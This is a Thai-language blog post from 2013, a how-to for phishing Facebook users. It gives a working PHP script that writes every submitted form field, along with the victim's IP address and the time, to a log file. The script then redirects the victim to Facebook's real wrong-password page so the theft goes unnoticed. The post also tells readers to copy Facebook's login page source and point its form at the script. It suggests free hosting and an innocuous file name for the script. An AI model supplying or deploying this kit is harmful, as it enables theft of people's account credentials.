วันพฤหัสบดีที่ 31 ตุลาคม พ.ศ. 2556

Phishng แบบสำเร็จรูป



สามารถ ใช้ Hosting ฟรีได้ที่ 000webhost.com / hosting.in.th

Phishing คึอการใช้ "หน้าเข้าสู่ระบบปลอม" "หน้าซื้อของออนไลน์ปลอม" หรือหน้าอะไรก็แล้วแต่เพื่อหลอกให้เป้าหมายกรอกข้อมูลที่เราต้องการ แล้วข้อมูลพวกนั้นก็จะบันทึกอยู่ในล็อกของเรา.

นี้คือสคริป Phishing ที่เราจะใช้กัน พร้อมอธิบายว่า Function ตัวไหนทำอะไรบ้าง ให้อ่านคอมเม้นที่อยู่ในโค้ตก่อนนะครับ (คอมเม้นคือ บรรทัดที่เริ่มด้วย "//"):
Code:
<?php

// นี้คือลิงค์ที่เหยื่อจะถูกเด้งไป หลังจากที่ล็อกอินเข้าในหน้า Phishing ของเราแล้ว (เปลี่ยนได้ ตามสถานการณ์).
header("Location: https://www.facebook.com/en/login/check.php ");
// ที่ผมใช้ https://www.facebook.com/en/login/check.php เพราะมันจะเด้งไปหน้า "รหัสผิด" ของเว็ป facebook(เว็ปจริง) เพื่อความเนียน.

// สร้างไฟล์ log.txt ขึ้นมา(ถ้ายังไม่มี) เพื่อบันทึกข้อมูลที่เหยื่อกรอกลงไปในหน้า Phishing
$handle = fopen("log.txt", "a");
fwrite($handle, "\r\n");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);

// ต้องเป็นชื่อไฟล์เดียวกับ .txt ด้านบนเท่านั้นนะครับ
$myFile = "log.txt";
$fh = fopen($myFile, 'a');

//ดักไอพีเหยื่อ
$ip2 = $_SERVER['REMOTE_ADDR'];
$ip = "IP=" . $_SERVER['REMOTE_ADDR'] . "\n" ;
$stringData = "------------------------------------------\n";
$date = "Date=" . date('Y-m-d H:i:s');

fwrite($fh, $ip);
fwrite($fh, "\r\n");
fwrite($fh, $date);
fwrite($fh, "\r\n");
fwrite($fh, $stringData);
fwrite($fh, "\r\n");
fwrite($fh, "\r\n");

fclose($fh);

exit;
?>
ก็อปไปใส่ Notepad แล้วให้บันทึกเป็นนามสกุล .php ตั้งชื่อว่า login.php หรืออะไรก็ได้ที่ดูไม่น่าสงสัย จากนั้นอัพขึ้นไปบนโฮสของคุณที่สมัครไว้แล้ว. หลายคนอาจจะถามว่าทำไมต้องมี Function ดักไอพีเข้ามาด้วย? มันแล้วแต่สถานการณ์ครับ เดียวจะอธิบายว่าทำไม.

หาเป้าหมาย
ข้อมูลที่ซ่อนอยู่ : 
ก่อนอื่นเราต้องรู้จักเป้าหมายของเรา ว่าเราต้องการจะแฮกใคร? ตัวอย่างนี้เป้าหมายผมคือ คนที่เล่น facebook. ให้เข้าไปที่หน้าล็อกอิน https://www.facebook.com/en/login.php จากนั้นให้คลิกขวาแล้วไปที่ View page source แล้วก็อปโค้ตทั้งหมดไปไว้ใน Notepad. เราต้องแก้ไขโค้ตกันนิดหน่อย เพื่อใช้งานร่วมกับสคริป Phishing ของเรา.

ในโค้ตที่ก็อปมา ให้หาบรรทัดที่เกี่ยวกับกล่องข้อความที่ใช้ใส่ยูสเซ่อเนมและ รหัสผ่านหรือข้อมูลที่เราต้องการ เช่นตัวอย่างของ http://www.facebook.com/en/login.php คือ บรรทัดที่ 64.
Code:
<form name="controlForm" id="controlForm" method="POST" action="https://www.facebook.com/en/login/check.php" onsubmit="return formSubmit();">


ให้เราแก้ https://www.facebook.com/en/login/check.php เป็นที่อยู่ของไฟล์ Phishing ของเรา เช่น:
Code:

<form name="controlForm" id="controlForm" method="POST" action="/facebook/login.php" onsubmit="return formSubmit();">



หน้าต่าง Phishing จะเป็นแบบนี้>>สัเกตุ URL ด้วยนะครับ อย่าเผลอกรอก
เชียวละ






เขียนโดย ที่

ไม่มีความคิดเห็น:

แสดงความคิดเห็น

สมัครสมาชิก: ส่งความคิดเห็น (Atom)